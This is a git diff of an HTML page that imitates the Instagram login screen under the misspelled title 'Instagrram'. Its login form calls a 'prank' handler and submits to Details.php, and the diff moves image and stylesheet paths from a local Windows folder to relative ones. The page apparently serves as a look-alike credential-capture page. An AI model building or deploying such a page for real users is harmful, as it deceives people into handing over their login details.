--- a/Index.html
+++ b/Index.html
@@ -3,19 +3,19 @@
 <head> 
 
 <meta charset="UTF-8"> 
-<link data-default-icon="https://static.cdninstagram.com/rsrc.php/v3/yb/r/lswP1OF1o6P.png" rel="icon" sizes="192x192" href="https://static.cdninstagram.com/rsrc.php/v3/yb/r/lswP1OF1o6P.png" /> 
+<link data-default-icon="Web_Icon.png" rel="icon" sizes="192x192" href="Web_Icon.png" /> 
 <title>Instagrram</title> 
-<link rel="stylesheet" href="C:\Users\u1091915\Documents\PLSQL\HTML_CSS\Insta\Insta_style.css"> 
-<!-- <script src="C:\Users\u1091915\Documents\PLSQL\HTML_CSS\Insta\Insta_Javascript.js"></script>-->
+<link rel="stylesheet" href="style.css"> 
+<!-- <script src="C:\Users\u1091915\Documents\PLSQL\HTML_CSS\Insta\script.js"></script>-->
 </head> 
 
 <body> 
 <div class="Test_screen"> 
-    <img width="390" height="550" src="C:\Users\u1091915\Documents\PLSQL\HTML_CSS\Insta\Screen.jpg"> 
+    <img width="390" height="550" src="Reels_Screen.jpg"> 
 </div>
  
 <div class="login-box"> 
-    <img width="200" height="80" src="C:\Users\u1091915\Documents\PLSQL\HTML_CSS\Insta\Insta_font.jpg"> 
+    <img width="200" height="80" src="Insta_font.jpg"> 
     <br> 
 	
 	<form id="loginForm" onsubmit="prank(event)" action="Details.php"> 
@@ -30,7 +30,7 @@
        </div> 
   
        <a class="image-link" href="New.html" target="New.html">
-          <img width="200" height="80" src="C:\Users\u1091915\Documents\PLSQL\HTML_CSS\Insta\FB.jpg">
+          <img width="200" height="80" src="FB.jpg">
 	   </a> 
 	</form> 
 
@@ -44,11 +44,11 @@
 </div>
 
 <div>
-    <a class="App_Store" href="New.html" target="New.html"><img width="260" height="40" src="C:\Users\u1091915\Documents\PLSQL\HTML_CSS\Insta\Get_app.jpg"></a>
+    <a class="App_Store" href="New.html" target="New.html"><img width="260" height="40" src="Get_app.jpg"></a>
 </div>
 
 <div class="Get_Bottom">
-    <img width="750" height="55" src="C:\Users\u1091915\Documents\PLSQL\HTML_CSS\Insta\Bottom.jpg">
+    <img width="750" height="55" src="Bottom.jpg">
 </div>
 
 <script>
